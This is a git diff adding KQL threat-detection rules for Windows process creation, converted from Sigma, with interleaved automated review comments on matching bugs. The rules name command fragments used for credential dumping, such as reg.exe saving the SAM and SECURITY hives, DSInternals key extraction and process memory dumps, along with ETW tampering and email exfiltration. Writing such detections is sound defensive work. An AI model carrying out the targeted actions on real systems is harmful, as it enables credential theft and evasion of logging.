+| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql b/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql
new file mode 100644
index 00000000..f6cb2abe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql
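Review bot: `FolderPath endswith "driverquery.exe"` in the `| where` line of driverquery_exe_execution.kql is the only image match in this batch without a leading `\\`, so any executable whose name merely ends in that string also satisfies the selection; the same unanchored form appears as `FolderPath endswith "reg.exe"` inside the exclusion of enumeration_for_3rd_party_creds_from_cli.kql, where it widens the filter and therefore suppresses detections rather than adding them. Anchoring both on the separator, `FolderPath endswith "\\driverquery.exe"` and `FolderPath endswith "\\reg.exe"`, would bring them in line with the surrounding rules. If the upstream Sigma rules carry these values as written, the place to correct them is the converter (a small post-conversion lint for `endswith` image matches lacking a separator) or the source rule, not the generated file.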
@@ -0,0 +1,10 @@
+// Title: Dropping Of Password Filter DLL
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql
new file mode 100644
index 00000000..5f0d892e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql
@@ -0,0 +1,13 @@
+// Title: DSInternals Suspicious PowerShell Cmdlets
+// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri
+// Date: 2024-06-26
+// Level: high
+// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
+// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate usage of DSInternals for administration or audit purpose.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Add-ADDBSidHistory" or ProcessCommandLine contains "Add-ADNgcKey" or ProcessCommandLine contains "Add-ADReplNgcKey" or ProcessCommandLine contains "ConvertFrom-ADManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-GPPrefPassword" or ProcessCommandLine contains "ConvertFrom-ManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-UnattendXmlPassword" or ProcessCommandLine contains "ConvertFrom-UnicodePassword" or ProcessCommandLine contains "ConvertTo-AADHash" or ProcessCommandLine contains "ConvertTo-GPPrefPassword" or ProcessCommandLine contains "ConvertTo-KerberosKey" or ProcessCommandLine contains "ConvertTo-LMHash" or ProcessCommandLine contains "ConvertTo-MsoPasswordHash" or ProcessCommandLine contains "ConvertTo-NTHash" or ProcessCommandLine contains "ConvertTo-OrgIdHash" or ProcessCommandLine contains "ConvertTo-UnicodePassword" or ProcessCommandLine contains "Disable-ADDBAccount" or ProcessCommandLine contains "Enable-ADDBAccount" or ProcessCommandLine contains "Get-ADDBAccount" or ProcessCommandLine contains "Get-ADDBBackupKey" or 
ProcessCommandLine contains "Get-ADDBDomainController" or ProcessCommandLine contains "Get-ADDBGroupManagedServiceAccount" or ProcessCommandLine contains "Get-ADDBKdsRootKey" or ProcessCommandLine contains "Get-ADDBSchemaAttribute" or ProcessCommandLine contains "Get-ADDBServiceAccount" or ProcessCommandLine contains "Get-ADDefaultPasswordPolicy" or ProcessCommandLine contains "Get-ADKeyCredential" or ProcessCommandLine contains "Get-ADPasswordPolicy" or ProcessCommandLine contains "Get-ADReplAccount" or ProcessCommandLine contains "Get-ADReplBackupKey" or ProcessCommandLine contains "Get-ADReplicationAccount" or ProcessCommandLine contains "Get-ADSIAccount" or ProcessCommandLine contains "Get-AzureADUserEx" or ProcessCommandLine contains "Get-BootKey" or ProcessCommandLine contains "Get-KeyCredential" or ProcessCommandLine contains "Get-LsaBackupKey" or ProcessCommandLine contains "Get-LsaPolicy" or ProcessCommandLine contains "Get-SamPasswordPolicy" or ProcessCommandLine contains "Get-SysKey" or ProcessCommandLine contains "Get-SystemKey" or ProcessCommandLine contains "New-ADDBRestoreFromMediaScript" or ProcessCommandLine contains "New-ADKeyCredential" or ProcessCommandLine contains "New-ADNgcKey" or ProcessCommandLine contains "New-NTHashSet" or ProcessCommandLine contains "Remove-ADDBObject" or ProcessCommandLine contains "Save-DPAPIBlob" or ProcessCommandLine contains "Set-ADAccountPasswordHash" or ProcessCommandLine contains "Set-ADDBAccountPassword" or ProcessCommandLine contains "Set-ADDBBootKey" or ProcessCommandLine contains "Set-ADDBDomainController" or ProcessCommandLine contains "Set-ADDBPrimaryGroup" or ProcessCommandLine contains "Set-ADDBSysKey" or ProcessCommandLine contains "Set-AzureADUserEx" or ProcessCommandLine contains "Set-LsaPolicy" or ProcessCommandLine contains "Set-SamAccountPasswordHash" or ProcessCommandLine contains "Set-WinUserPasswordHash" or ProcessCommandLine contains "Test-ADDBPasswordQuality" or ProcessCommandLine contains 
"Test-ADPasswordQuality" or ProcessCommandLine contains "Test-ADReplPasswordQuality" or ProcessCommandLine contains "Test-PasswordQuality" or ProcessCommandLine contains "Unlock-ADDBAccount" or ProcessCommandLine contains "Write-ADNgcKey" or ProcessCommandLine contains "Write-ADReplNgcKey"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql
new file mode 100644
index 00000000..abbf891a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Dumping of Sensitive Hives Via Reg.EXE
+// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
+// Date: 2019-10-22
+// Level: high
+// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
+// False Positives:
+// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql b/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql
new file mode 100644
index 00000000..52766419
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql
@@ -0,0 +1,12 @@
+// Title: Dumping Process via Sqldumper.exe
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2020-10-08
+// Level: medium
+// Description: Detects process dump via legitimate sqldumper.exe binary
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate MSSQL Server actions
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumpminitool_execution.kql b/KQL/rules/windows/process_creation/dumpminitool_execution.kql
new file mode 100644
index 00000000..c2ec9934
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumpminitool_execution.kql
@@ -0,0 +1,10 @@
+// Title: DumpMinitool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql b/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql
new file mode 100644
index 00000000..48ec75ef
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql
@@ -0,0 +1,10 @@
+// Title: DumpStack.log Defender Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: critical
+// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql
new file mode 100644
index 00000000..7e212732
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql
@@ -0,0 +1,14 @@
+// Title: Dynamic .NET Compilation Via Csc.EXE
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-08-24
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897
+// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962
+// - Ansible
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains 
"JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql b/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql
new file mode 100644
index 00000000..5a0a00a1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Email Exifiltration Via Powershell
+// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects email exfiltration via powershell cmdlets
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql b/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql
new file mode 100644
index 00000000..bbd19baf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql
@@ -0,0 +1,11 @@
+// Title: Enable LM Hash Storage - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql
new file mode 100644
index 00000000..f9ae9080
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql
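Review bot: `ProcessCommandLine contains " 0"` in the `| where` line of enable_lm_hash_storage_proccreation.kql also matches the hardening direction the rule's own description distinguishes from, because a value written as `0x1` (or any `0x`-prefixed non-zero literal) still contains the substring ` 0`; an administrator re-enabling NoLMHash would therefore trigger a high-severity alert. The header comments describe the intent ("setting this registry value to 0"), so the mismatch is between the documented intent and the generated predicate. If the substring comes straight from the upstream Sigma rule, consider having the converter emit a value-anchored form for such cases, for example (constructed, to be validated against real telemetry) `ProcessCommandLine matches regex @"\s0(x0+)?(\s|$)"`, or at least add an exclusion for `" 0x1"` so the common hardening command is not flagged.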
@@ -0,0 +1,10 @@
+// Title: Enumerate All Information With Whoami.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-04
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/all" flag
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all" or ProcessCommandLine contains " –all" or ProcessCommandLine contains " —all" or ProcessCommandLine contains " ―all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql
new file mode 100644
index 00000000..35b453b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql
@@ -0,0 +1,10 @@
+// Title: Enumeration for 3rd Party Creds From CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (not(((ProcessCommandLine contains "export" or ProcessCommandLine contains "save") and FolderPath endswith "reg.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql b/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql
new file mode 100644
index 00000000..50aa7bd6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Enumeration for Credentials in Registry
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
+// The Windows Registry stores configuration information that can be used by the system or other programs.
+// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql b/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql
new file mode 100644
index 00000000..109dcafe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql
@@ -0,0 +1,12 @@ +// Title: Esentutl Gather Credentials +// Author: sam0x90 +// Date: 2021-08-06 +// Level: medium +// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404 +// False Positives: +// - To be determined + +DeviceProcessEvents +| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql b/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql new file mode 100644 index 00000000..6e265852 --- /dev/null +++ b/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql @@ -0,0 +1,12 @@ +// Title: Esentutl Steals Browser Information +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r" or ProcessCommandLine contains "–r" or ProcessCommandLine contains "—r" or ProcessCommandLine contains "―r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql new file mode 100644 index 00000000..046358e9 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql @@ -0,0 +1,13 @@ +// Title: ETW Logging Tamper In .NET Processes Via CommandLine +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: high +// Description: Detects changes to environment variables related to ETW logging via the CommandLine. +// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql b/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql new file mode 100644 index 00000000..e50564d9 --- /dev/null +++ b/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql 
@@ -0,0 +1,10 @@ +// Title: ETW Trace Evasion Activity +// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-03-22 +// Level: high +// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql b/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql new file mode 100644 index 00000000..2d8999c7 --- /dev/null +++ b/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql 
@@ -0,0 +1,10 @@ +// Title: Exchange PowerShell Snap-Ins Usage +// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql new file mode 100644 index 00000000..8f44355c --- /dev/null +++ b/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql 
@@ -0,0 +1,12 @@ +// Title: Execute Code with Pester.bat +// Author: Julia Fomina, oscd.community +// Date: 2020-10-08 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql new file mode 100644 index 00000000..3df968c6 --- /dev/null +++ b/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql 
@@ -0,0 +1,12 @@ +// Title: Execute Code with Pester.bat as Parent +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-20 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql b/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql new file mode 100644 index 00000000..b556e4c3 --- /dev/null +++ b/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql @@ -0,0 +1,12 @@ +// Title: Execute Files with Msdeploy.exe +// Author: Beyu Denis, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects file execution using the msdeploy.exe lolbin +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents +| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql b/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql new file mode 100644 index 00000000..fd3ac9b2 --- /dev/null 
